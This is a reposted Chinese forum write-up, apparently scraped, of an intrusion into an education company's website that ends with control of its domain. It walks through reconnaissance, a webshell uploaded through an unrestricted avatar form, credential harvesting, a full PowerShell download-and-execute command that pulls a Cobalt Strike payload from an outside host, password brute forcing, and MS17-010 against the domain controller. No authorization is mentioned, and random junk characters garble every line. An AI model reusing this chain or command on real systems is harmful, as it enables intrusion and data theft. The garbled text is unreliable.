|
5 g- `) d$ |; v. n1 d! ~- g 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路7 @3 Y0 a6 P& p
. F& S% y0 E6 \4 m. v% R
* t, ~( ~4 M" O) X- R: k 3 |4 h6 ^: l( d+ \! s& V' T
& N! n5 p; ~ E3 @" E
4 w. g# I3 o x, j1 f) T 正文
7 e6 A& J$ T4 u! x1 ~
* U: m% W0 O' c; d
8 k4 H5 a" e3 F+ v5 \4 q 1 C, d3 ~& C# V3 h9 ~7 O' ?
& z5 i+ C) ~- @; r
$ ]9 f# J) V# M( q3 p 目标:www.xxxx.com(一家教育机构)
2 s$ j+ F; r" L" J" g& @1 q. L% C0 W
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
2 o4 X- h; c4 [$ C2 @4 ^ g# t 6 B' s. s2 F b: a: p: o
7 N [9 g% `4 | 
' p- ~! n; x. I I: F( Z / u/ A5 W* e- U' d- p
3 ]6 \! c# S6 V# D" B! W
进行了简单的信息搜集
8 Q1 K- e; @& }, Z% \% f( S) D
% \6 \: _9 Y) Q0 |3 X# S$ W
1 i) b9 \; ^$ `8 O5 [ |- v 3 n) w2 w5 A: f+ m7 t6 _: `
& z# H) W c; f6 J# V0 d
子域名搜集& C; l) ?" M% b# F
' M, R% S8 U0 I: ?( Y1 T
8 @4 P% |4 |7 d* c, o0 a  2 N& ~) ~2 k+ D( Y3 D, B
2 ]2 g, u# @( k6 l! O" G) k \
% j8 {1 M0 `! j$ H7 ?4 T! c fofa找资产
6 C& q0 y8 o* b
3 n0 q7 g; v" k( n1 m+ b6 M
V" F* v1 D, ^% R$ H0 {" s6 s, k6 Y ) R4 H7 [4 ]+ d
+ ~2 Q ?! R) k0 I V  & p: m- s! ?* P$ T8 M
& O% W1 w6 @; U0 d
0 |. f; G+ o% ~/ l4 l
一共七个资产。去重之后只有两个。
% |% y1 j/ x/ u1 T8 y5 d
% a1 J% Y$ I7 J% [8 A# z
1 j2 e7 R* P- a/ D " a/ R5 I6 R9 @2 k5 D1 ~
( S8 j' h: V6 c# o: A 目录探测
8 u+ M; u7 D1 R" ~3 D. i 8 j4 u$ Q! E I$ l
5 [" K1 S3 m$ Y! X$ }, s
 + _5 N& I. X- h7 P0 ?1 R
+ j0 ]) @# l# Z3 G" G- M0 w6 ]
/ O# U0 C% U. ~: ^* v3 F
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
. E- a/ J: a0 l: s
/ R$ i d# H- J- Q) e/ o
: \ |4 T- R& N) S2 w. ] 6 O6 M2 f$ i' i/ D4 `- u$ o8 G
8 O: r6 Y0 p0 u 我又尝试了通过修改返回包来绕过登录界面
0 ]8 `4 o; u6 l$ E / j0 y! y6 J" i* K2 D
/ Y/ g1 G) W, z9 q  4 s) E, [) n6 Z! I T" ]! K: U
( ~; I$ H; T" u- _( v; N6 u
2 G. A8 d0 ]1 e0 d6 C' z9 _* w) k4 U 还是不行,尝试注入无果
" H* D1 x( c) @, w' M$ p ; s t' a; @1 @$ c0 W5 q$ g; L
1 x" `$ O' D+ Y! t) r! ~, W  & m, @) ?" e& o! n. \
+ P* }) ]/ D( o5 `$ }& W
8 v$ N- B+ P: o( q5 e 不过我目录探测出了一处Spring信息泄露
4 f ]$ @, v2 ?$ o: H/ E
$ Q* G* X& ^( [. W5 @8 {* \
( f, ^0 b0 H! ]5 x2 I
+ y" d" M0 G$ j* M1 x
. ?5 i6 P# s \4 X ~" M' Q" S
1 ?; _0 R, g1 w9 v" F2 j " B% i8 n0 n$ r/ Z
9 ~, j; v4 N! ?7 I7 y( `" R 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
* V( L. ]$ h. d$ T. Y- F6 ?
! V- g7 M8 T: M
( m3 Y- `3 y5 v; J) F  ; E1 k6 ]/ t% T9 P6 R2 f, K" w
4 w2 G1 i2 D( {4 S
; `& l+ X' d# o6 j1 o. O+ M 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。% H2 o3 p" w1 T$ l' i% j' `
* I; }4 y$ z- f4 {' Z. W! P
9 m0 C3 p# I$ t+ L+ c6 N 
/ z: ]7 E$ j! J
5 B6 D# d, @7 r' M8 q. i7 G( [- H
% Z% t, U/ v/ x5 |2 F7 O 获取有些师傅到这一步就手机抓包电脑测了。
* {+ J+ z/ q6 w2 |! _# u% J . x4 ?( }: P$ Q3 q, P1 g
" [. q: N! J3 W# w Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
# m, a+ P, o' j: B
' [1 E" T q7 R$ `- [* S- X' \7 J: T
其中在一个公众号发现了小程序,可以进行注册。. h, w3 L! @- `6 K- V' p0 |: ]
* A I" v& l, D0 ^1 M1 F9 m
+ S: ~$ v \* O$ V. v$ J. e 看到了头像上传,尝试上传获取WebShell
2 N" W2 ^; d# Q0 u6 M c) m , O8 S: M- {) V0 k, T
0 m7 _, f9 j1 A7 C9 _  0 H2 ?' c, N M: l
, [2 q9 D* K2 h! Q- U" t1 y
5 r2 _# {! P) a/ T
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 A) R* ~1 J H3 E; V
5 u2 U* r+ `' x0 C6 M# m& e, B) V" F# U Y2 g7 q# u6 O
: O, b* g( F9 a M & [9 Q) L% Q- ]! Q
% C7 o) b$ U+ [; o 然后上了大马" r j M$ n1 M5 Y
1 x% c0 Q" H- H% d! t8 g/ l' s$ T+ S6 J3 w1 W6 v% ^: m% `
* u- g8 n& q! S3 @( x
6 H/ l G C+ h6 A% A. k0 q% Z* v1 `2 i# v5 @& \
 8 X" J+ J6 |) U
' [! D" [8 v; ~/ M
) o* F: w5 D( H1 N9 @# {- k S6 O 通过翻找文件发现数据库账号密码* ^! B$ X' k- h: |0 m- ?
0 y1 H) V- H8 v1 D
$ k7 k: r% ^& `$ z
 ' D8 M8 o. G2 B' U7 c9 w( v
+ c u: U0 o+ O% u
' m( R6 O4 T( r6 ] --内网渗透
$ Y' ^' D6 ~6 E" r- i& S! Z2 O 7 H9 g! \ m% {- C9 q
7 c l% w: K+ R) x( @" L0 I 直接通过powershell执行 cs上线
4 j8 w7 |3 j4 _; U 7 N( S1 B" W1 Z2 i4 _
4 |, y: N$ i" R$ r7 ` powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
" v/ p- F6 K B, b : c! Z& r7 X+ O: }9 V5 w0 Q3 y* x" P
" r% | x# |* N. V- Y) B; F7 \
 & `2 M- L8 _5 F! j& K2 k: ~
/ Q' P9 K9 n( A0 D
' i" Q. S2 y( \- `1 L
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破( U( e5 Z2 ^8 M
+ K' s" S) X3 Z, S! w* G2 U( ?
4 q: U1 g) l# l& j7 }# n  : ~9 _" B7 f7 N% H$ C# x
: N1 W% E2 S! N! a, d1 k" V/ t) ?+ h' w
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 F4 i& ]1 q; {4 m0 u& P8 l# T5 E
1 o0 z! f4 B0 l( o4 N
0 p |+ e5 P- f
2 _0 B+ l1 S4 m- ? " H ^: i5 N4 j6 o
9 ~! T+ ~$ o' K+ X8 k& C2 F 
, X5 r- W) Q1 W3 C" \9 P8 G/ A
/ T+ Q! e, v; n. R2 U" o3 ]% Z" W) [& t) w7 [ {: F
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 }0 ]+ z' L% A9 k( v" t, a D( g
' L Q$ i( R$ G- }& y: X
: D6 r* |4 J: V- f" _4 J8 |" C
$ R( R; O7 p$ a6 ~! `* P: p6 R) C# O: U. _' m& E; j- s+ L9 n
- O( w% j5 O1 L4 Q* ?
0 Q. s& i5 s+ B) v6 K; k
9 D. f! m( I, S* X8 m
& p# V1 ~1 w. [. A! t
4 _. r0 e, j% r1 ~1 |$ U
' K( g, H8 E k% a+ |7 k* W $ { m/ ], e$ N2 u; p% ]6 I" e
- g' w3 a% Q. O% {1 g
/ V' s" S( [4 x* L# V8 w; v % g+ X: x1 ^* r6 r& a' H( g
# r3 J( c& a0 a8 }+ Z+ e H" X
小结. w! G+ c+ t# L# F7 U4 ^+ D
. @) K, _/ ^ v
' E' y+ y9 q. f
0 N8 K& t; ~) T) S) a ) k) I \* z' D$ H
* |# C7 P. ~% D: s$ ~- [1 z t3 @' @
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!/ A9 R" P. W D: L; L0 Q9 L# Z% N
z3 p$ u: H% t+ k- P% @. w. Q( X" V: {
# G5 r8 K7 i7 [4 e 6 Q" Y0 X, g/ ~& r
- s) H% L- F: ~' g% U
- 5 |6 W8 {) k7 D; s9 s# x% c+ P
0 r) j) b" x3 ]5 x, y4 m
4 y' f, a% P2 R6 F
- - H3 ~0 O2 ~# O
$ M- J* a/ F' C! o% ~
5 n8 X6 E! V( q# A
$ Q5 m* j% k- z9 ~) R P! j8 f) [
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
3 q* |' i3 R5 i3 m |/ A6 N& e
( P& l4 K* {3 R1 v; Q) L
2 Q+ C! `0 t/ `/ N2 O( l
+ m/ [ W% G. b3 @ g | 
发表于 2024-3-1 19:41:32
收藏
支持
反对